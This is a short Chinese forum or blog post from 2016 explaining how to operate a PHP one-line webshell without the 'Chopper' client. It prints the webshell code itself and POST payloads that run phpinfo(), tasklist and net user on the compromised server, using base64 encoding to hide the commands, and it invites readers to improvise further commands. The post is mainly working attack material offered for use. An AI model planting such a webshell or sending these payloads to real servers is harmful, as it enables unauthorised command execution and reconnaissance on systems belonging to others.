一句话脱离菜刀执行命令

2016-03-28 09:37:17 33 5376 1


是否还在当心菜刀有后门导致webshell被盗?一句话就一定要在菜刀里使用?当然不是,我们完全可以模拟post包来实现一句话的执行,方法如下:
1.假设一句话为:<?php eval($_POST[cmd])?>
2.执行phpinfo()时post提交:cmd=phpinfo();



执行tasklist时,post提交:cmd=$a=dGFza2xpc3Q;$b=base64_decode($a);system($b);    (其中dGFza2xpc3Q为tasklist的base64编码,注意要删除后面的等号)



执行net user时,post提交:cmd=$a=bmV0IHVzZXI;$b=base64_decode($a);system($b);



3.其它的请自由发挥!!!
TCV=1

关于作者

评论33次

要评论?请先  登录  或  注册